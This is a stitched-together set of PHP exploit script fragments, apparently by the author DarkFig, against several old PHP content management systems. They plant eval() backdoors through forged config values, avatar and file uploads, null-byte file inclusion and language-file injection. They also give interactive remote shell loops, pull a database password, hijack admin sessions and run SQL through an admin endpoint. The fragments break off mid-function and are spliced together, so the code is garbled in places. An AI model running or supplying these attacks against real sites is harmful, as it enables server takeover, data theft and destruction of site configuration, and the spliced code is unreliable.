# |
# 142. function ConfigSave(...
# 212. $file = fopen("config.php","w");
# 401. $content .= "\$perpage = $xperpage;\n";
# 402. $content .= "\$popular = $xpopular;\n";...
# 614. fwrite($file, $content);
# 615. fclose($file);
#
# PHP that the forged config value smuggles into config.php: it eval()s whatever
# arrives in the Referer header of a later request (the shell loop below relies on
# exactly that). HTTP_REFERER is left as a bare constant on purpose — the written
# config must contain no quotes.
$PHPCODE = 'if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER])';
# Default config values, POSTed as a whole to admin.php?op=ConfigSave.
# You can get the config here ./admin.php?op=Configure
# Per the quoted ConfigSave (lines 401-402 above) each value is written UNQUOTED into
# config.php, so "xtop" => "10;{$PHPCODE}" presumably ends up as `$top = 10;<PHPCODE>;`
# — a persistent backdoor inside the site's own config file that survives until an
# admin saves the configuration again.
# Everything else is the stock default, so submitting this array also RESETS the
# target's configuration (site name, logo, xmyIP, mail settings, ...); pull the live
# values from ./admin.php?op=Configure first if the original settings matter.
$config = array(frmdt_url => $url . 'admin.php', "xparse" => "1", "xgzhandler" => "0", "xfilemanager" => "0", "xadmin_cook_duration" => "240", "xuser_cook_duration" => "8000", "xsitename" => "NPDS SABLE", "xTitlesitename" => "NPDS - générateur de portail Php / Mysql en Open Source", "xnuke_url" => "http://www.npds.org", "xsite_logo" => "themes/Permanent-Double-Side/images/npds_p.gif", "xslogan" => "NPDS SABLE", "xstartdate" => "01/10/2005", "xtop" => "10;{$PHPCODE}", "xstoryhome" => "10", "xoldnum" => "10", "xultramode" => "1", "xanonymous" => "Anonyme", "xanonpost" => "0", "xtroll_limit" => "6", "xmod_admin_news" => "0", "xnot_admin_count" => "1", "xDefault_Theme" => "Permanent-Double-Side", "xstart_page" => "index.php?op=edito", "xlanguage" => "french", "xmulti_langue" => "false", "xlocale" => "french", "xlever" => "08:00", "xcoucher" => "20:00", "xgmt" => "", "xbanners" => "0", "xmyIP" => "1.1.1.100", "xfoot4" => "", "xbackend_title" => "NPDS", "xbackend_language" => "fr-FR", "xfoot1" => "Tous les Logos et Marques sont déposés, les commentaires sont sous la responsabilité de ceux qui les ont publiés, le reste @ npds.org", "xfoot2" => "Ce site a été construit avec <a href=http://www.npds.org CLASS=NOIR>NPDS</a>, un système de portail écrit en PHP. 
Ce logiciel est sous <a href=http://www.gnu.org CLASS=NOIR>GNU/GPL license</a>.", "xfoot3" => "syndication de vos News via <a href=http://www.votre_site/backend.php CLASS=NOIR>www.votre_site/backend.php</a> -::- + encore via le NPDS Push Infos System", "xbackend_image" => "", "xbackend_width" => "88", "xbackend_height" => "31", "xperpage" => "10", "xpopular" => "10", "xnewlinks" => "10", "xtoplinks" => "10", "xlinksresults" => "10", "xlinks_anonaddlinklock" => "0", "xlinkmainlogo" => "0", "xOnCatNewLink" => "1", "xadminmail" => "", "xmail_fonction" => "1", "xEmailFooter" => "", "xnotify" => "0", "xnotify_email" => "*****@*****.**", "xnotify_subject" => "Nouvelle soumission", "xnotify_message" => "Le site a recu une nouvelle soumission !", "xnotify_from" => "webmaster", "xmoderate" => "1", "xcommentlimit" => "4096", "xmaxOptions" => "12", "xBarScale" => "1", "xsetCookies" => "1", "xpollcomm" => "1", "xtipath" => "themes/Permanent-Double-Side/images/topics/", "xuserimg" => "/themes/Permanent-Double-Side/images/menu/", "xadminimg" => "images/admin/", "xadmingraphic" => "0", "xadmf_ext" => "gif", "xshort_menu_admin" => "1", "xsite_font" => "Verdana, Arial, Helvetica", "xadmart" => "10", "xminpass" => "5", "xshow_user" => "20", "xsmilies" => "1", "xavatar_size" => "60*80", "xshort_user" => "0", "xAutoRegUser" => "1", "xmemberpass" => "1", "xsubscribe" => "1", "xmember_invisible" => "0", "xCloseRegUser" => "0", "xhttpref" => "1", "xhttprefmax" => "1000", "xmember_list" => "0", "xdownload_cat" => "Tous", "xshort_review" => "0", "xrss_host_verif" => "false", "xcache_verif" => "true", "xdns_verif" => "false", "xsavemysql_size" => "256", "xsavemysql_mode" => "1", "xtiny_mce" => "true", "op" => "ConfigSave");
# 0_o my website has been reset
# (the whole config.php is rewritten with the defaults above — this is destructive, not
# just a payload drop)
#
$xpl->formdata($config);
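# Interactive shell: each command is sent in the Referer header of a request for
# config.php, where the injected `eval($_SERVER[HTTP_REFERER])` runs it as PHP.
# Note that $cmd is spliced in UNQUOTED (`@system(<cmd>)`), so a command containing
# spaces or shell syntax has to be typed with its own quotes; anything else is a PHP
# parse error on the target. Also: the command travels in a plain request header, so
# proxies and the web server's own logs will record it.
# Stops on "quit"/"exit" — or on EOF, which the original did not handle (fgets()
# returned false, trim(false) gave "" and the loop re-sent empty commands forever).
while (($line = fgets(STDIN)) !== false) {
    $cmd = trim($line);
    if (preg_match("#^(quit|exit)\$#", $cmd)) {
        break;
    }
    $xpl->addheader("Referer", "@system({$cmd});die;");
    $xpl->get($url . 'config.php');
    print $xpl->getcontent() . "\n\$shell> ";
}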
function getparam($param, $opt = '')
{
    global $argv;
    foreach ($argv as $value => $key) {
        if ($key == '-' . $param) {
            return $argv[$value + 1];
        }
    }
    if ($opt) {
        exit("\n-{$param} parameter required");
    $xpl->addcookie("sql_pseudo", $login);
    $xpl->addcookie("sql_pass", md5($pass));
    $xpl->addcookie("auto", "off");
    print "[*] PHPSESSID : {$phpsessid['1']}\n";
} else {
    exit("[*] Can't log in\n");
}
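//Id: unless an id was supplied on the command line, scrape the member id from the
// profile link in $s (the page fetched by the login step, outside this excerpt).
if (!isset($id)) {
    // $login is preg_quote()d so a name containing regex metacharacters cannot
    // break or widen the pattern (the original interpolated it raw).
    if (!preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . preg_quote($login, '#') . "<\\/a>#i", $s, $id_member)) {
        // Original fell through here with an undefined $id_member[1] and an empty id.
        exit("[*] Can't find the member id\n");
    }
    $id = $id_member[1];
}
print "[*] Id : {$id}\n";
//Upload: re-submit the profile form with $source as the avatar "test.jpg" (declared
// image/jpeg). The response is not inspected, so "Upload finish." and the success line
// below are printed whether or not the server accepted the file.
$formdata = array(
    frmdt_url => $url . '/index.php?mod=espace_membre&ac=profil',
    'action' => 'modifier',
    'ok' => '1',
    'id' => $id,
    'pseudo' => $login,
    'sql_newNom' => $login,
    'sql_newMail' => $email,
    'MAX_FILE_SIZE' => '2097152',
    'valider' => ' Modifier mon profil',
    'userfile[]' => array(frmdt_type => 'image/jpeg', frmdt_filename => 'test.jpg', frmdt_content => $source),
);
$xpl->formdata($formdata);
print "[*] Upload finish.\n";
// The avatar is expected at images/avatars/upload/<id>.jpg; it is reached through
// help.php?action=... with a trailing %00, presumably to cut off whatever suffix
// help.php appends to the path — that truncation only works on PHP builds that still
// honour null bytes in filesystem paths (pre-5.3.4).
$url = $url . "/eskuel/help.php?action=../../../images/avatars/upload/" . $id . ".jpg%00";
print "[*] Exploit Sucess !\n";
print "[*] The code can be run here : \nhttp://" . $url . "\n";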
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
<?php

/*
Title:          Jupiter CMS 1.1.5 File Upload Vulnerability
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <*****@*****.**>
URL:            http://www.acid-root.new.fr/advisories/12070214.txt
*/
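error_reporting(E_ALL ^ E_NOTICE);
// Target base URL — keep the trailing slash, paths are appended by plain concatenation.
// (The original literal had a stray leading space inside the quotes, which would have
// been sent as part of every request URL.)
$url = 'http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
// modules/emoticons.php is expected to store "req_file" under images/emoticons/ with the
// client-supplied filename, so a .php name survives; Content-Type is declared image/jpeg.
// The probe payload echoes the bare constant `iamontheserver`: on PHP < 8 an undefined
// constant degrades to its own name (with a notice), so the page prints it; on PHP 8 it
// throws an Error instead — use `echo 'iamontheserver';` against such targets.
$arr = array(
    frmdt_url => $url . 'modules/emoticons.php',
    "a" => 1,
    "req_file" => array(
        frmdt_filename => "iamaphpfile.php",
        frmdt_type => "image/jpeg",
        frmdt_content => "<?php echo(iamontheserver); ?>",
    ),
);
$xpl->formdata($arr);
// Request the uploaded file back; a body containing "iamontheserver" confirms execution.
$xpl->get($url . 'images/emoticons/iamaphpfile.php');
print $xpl->getcontent();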
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
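# Upload $file unchanged into ./downloads/ via files.php?action=save.
# Per the quoted handler above: the caller must pass isfileadmin() (line 44), the
# destination is $filepath . $upfile[name] with no extension filtering (line 71), and an
# existing name is NOT overwritten (line 72) — so a second run with the same filename
# silently does nothing.
print "\nTrying to upload the malicious file";
# Original passed file_get_contents() straight in; a missing/unreadable file became an
# empty upload and the script reported on that instead.
$payload = file_get_contents($file);
if ($payload === false) {
    exit("\nCan't read {$file}\n");
}
$frmdt = array(
    frmdt_url => $url . 'index.php?site=files&action=save',
    "fileurl" => 1,
    "upfile" => array(frmdt_filename => basename($file), frmdt_content => $payload),
);
$xpl->formdata($frmdt);
# $match_upload (defined elsewhere) is interpolated straight into the pattern, so it
# must already be a valid regex fragment for the # delimiter.
if (preg_match("#{$match_upload}#si", $xpl->getcontent())) {
    print "\nDone";
} else {
    print "\nFailed";
}
print " ({$url}downloads/" . basename($file) . ")\n";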
# Simple blind SQL injection (register_globals=On)
#
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort");
# Language configuration
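# Language configuration: open the admin editor for $filetoed and scrape every textarea
# (name + current value) so the whole file can be re-submitted with one value extended.
$xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}");
preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value);
# The original carried on with zero matches (undefined index on [2][0], an empty POST)
# and then dropped into the shell anyway; stop here instead — no fields usually means a
# bad admin session id or a different page layout.
if (empty($name_value[1])) {
    exit("\nNo language variables found in the editor page\n");
}
# We can't use:
# - <? OR <?php
# - <script language="php">
# - ' OR "
# so the payload is a chain of ${${expr}} constructs — presumably the value lands inside
# a double-quoted PHP string in the language file, where each ${...} is evaluated when
# the string is interpolated (confirm against the target). Every literal is produced by
# chrit() (defined elsewhere) to avoid quotes. The dropped $backdoor eval()s whatever
# arrives in a "Shell" request header.
$PHPCODE = '${${error_reporting(0)}}'
    . '${${$handle=fopen(' . chrit('./' . $backdoor) . ',' . chrit('w') . ')}}'
    . '${${fwrite($handle,' . chrit('<?php error_reporting(0);eval($_SERVER[HTTP_SHELL]);exit(0); ?>') . ')}}'
    . '${${fclose($handle)}}';
$name_value[2][0] .= $PHPCODE;
$postdata = array(
    frmdt_url => $url . 'admin/languages.php',
    "adminsid" => $sid,
    "action" => "do_edit",
    "lang" => $lang,
    "editwith" => 0,
    "inadmin" => 0,
    "file" => $filetoed,
    "Update Language Variables" => "  Update Language Variables",
);
# Re-send every scraped variable (entities decoded) so nothing else in the file changes.
$fields = count($name_value[1]);
for ($i = 0; $i < $fields; $i++) {
    $postdata[html_entity_decode($name_value[1][$i])] = html_entity_decode($name_value[2][$i]);
}
# print $xpl->showlastrequest();
$xpl->formdata($postdata);
# Trying to execute the php code: once via index.php (which should load the language
# file when $lang is the default) ...
$xpl->get($url . 'index.php');
# ... and once by requesting the rewritten file directly, for a non-default language.
$xpl->get($url . 'inc/languages/' . $lang . '/' . $filetoed);
print "\nThe php file should be created\n\$shell> ";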
# Hello master
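# Interactive shell through the dropped backdoor: the command travels in a custom
# "Shell" request header, which the backdoor hands to eval(). It is wrapped as
# system('<cmd>'), so a single quote in $cmd ends the string early — the commented
# example below uses exactly that to include inc/config.php and print the DB password.
# Stops on "quit"/"exit" — or on EOF, which the original did not handle (fgets()
# returned false, trim(false) gave "" and the loop re-sent empty commands forever).
while (($line = fgets(STDIN)) !== false) {
    $cmd = trim($line);
    if (preg_match("#^(quit|exit)\$#", $cmd)) {
        break;
    }
    # ');include('../../inc/config.php');print $config['password'];//
    $xpl->addheader('Shell', "system('{$cmd}');");
    $xpl->get($url . $backdoor);
    print $xpl->getcontent() . "\n\$shell> ";
}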
function sql_inject($field)
{
    global $xpl, $url, $prefix, $debug, $result, $bef, $aft, $truetime, $benchmark, $a, $b, $sub, $f;
$xpl = new phpsploit();
if ($prx) {
    $xpl->proxy($prx);
}
/* NOTE(review): what this cookie unlocks is not visible here — presumably it satisfies
   a rights check on the avatar/configuration pages; confirm against the target source. */
$xpl->addcookie("grade[a]", "a");
/* Code in the fake avatar. Two payloads, chosen by $mode (set elsewhere):
   mode 0 — when a request carries an "Upload" header, write a small self-deleting file
   uploader to w00t.php (relative to the server's working directory) and print
   "upfiledone";
   otherwise — when a request carries a "Shell" header, eval() it between two
   123456789 markers so the caller can cut the output out of the surrounding page.
   Both then include include/files/accueil.php, presumably so the page still renders. */
if ($mode == 0) {
    $file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>';
    /* The uploader is embedded in a single-quoted fputs() argument, so its own single
       quotes are backslash-escaped first. */
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>';
} else {
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>';
}
/* Upload avatar with PHP c0de: posted as 1.gif / image/gif for player id 1. Success is
   inferred from the JavaScript redirect the page answers with, not from the file itself. */
print " * uploading avatar\t";
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
    print "done\n";
} else {
    die("error\n");
}
/* Recover the stored avatar path from the player page; it becomes the new start page. */
if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) {
    $img = $match[1];
} else {
    die(" * can't find image name\n");
}
/* Change homepage to our avatar, with a null byte, after saving website name.
   The current site name is scraped so the configuration form can be re-submitted with
   only pagestart changed; the %00 truncation only works on PHP builds that still honour
   null bytes in include paths (pre-5.3.4). */
print " * changing homepage\t";
preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all);
/* NOTE(review): the $postdata statement that follows is truncated/redacted in this copy
   (a "******" fragment sits where the rest of the body and the closing print were) —
   the original statement is not recoverable from here. */
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=&reglement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n";
}
# Echo what the previous step scraped; $matches[2] holds login, passwd, user_id and
# session, in that order (the capture itself happens outside this excerpt).
$what = array("login", "passwd", "user_id", "session");
foreach ($what as $idx => $label) {
    print "\n" . $label . " -> " . $matches[2][$idx];
}
if (empty($matches[2][3])) {
    exit("\nNo session found");
}
# Logged in as admin: replay the scraped values as the three session cookies, each
# prefixed with $config[1] (cookie prefix, defined elsewhere).
# NOTE(review): admin_session and user_id both receive $matches[2][2] — the user_id slot
# above — and only sess_id gets [2][3]; looks deliberate, but confirm against the target.
$name = array("admin_session", "user_id", "sess_id");
$cookiePrefix = $config[1] . '_';
$xpl->addcookie($cookiePrefix . $name[0], $matches[2][2]);
$xpl->addcookie($cookiePrefix . $name[1], $matches[2][2]);
$xpl->addcookie($cookiePrefix . $name[2], $matches[2][3]);
# Upload $config[4] (the payload, defined elsewhere) as the profile photo "1.jpg" ...
$phpc = array(
    frmdt_url => $url . '?file=User&op=update_pref',
    'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4]),
);
$xpl->addheader('Referer', $url);
$xpl->formdata($phpc);
# ... then read the stored filename back from the preferences form; it is needed for
# the SQL step that follows.
$xpl->get($url . '?file=User&op=edit_pref');
if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) {
    exit("\nNo file found");
}
print "\n\$shell> ";
# Three statements for the admin "upgrade_db" endpoint, sent one per request:
# 1. retype <prefix>_block.type as a 60-char string (wide enough for a path),
# 2. point block 1's type at the uploaded photo through a ../ path — presumably so the
#    block loader include()s it (inferred from the path; confirm against the target),
# 3. empty <prefix>_nbconnecte (an online-user counter, going by its name).
# char() is a helper defined elsewhere. A commented-out variant in the original also
# toggled <prefix>_config.avatar_upload to 'on'; it stays disabled here.
# NOTE(review): the SQL goes into the body as a raw "upgrade=" value with no urlencode();
# that is only safe if $xpl->post() encodes it, or the target tolerates the raw bytes.
$tbl = $config['0'];
$sql = array(
    "ALTER TABLE {$tbl}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;",
    "UPDATE {$tbl}_block SET type=" . char('/../../../' . $match[1]) . " WHERE bid=1;",
    "DELETE FROM {$tbl}_nbconnecte;",
);
foreach ($sql as $statement) {
    $xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $statement);
}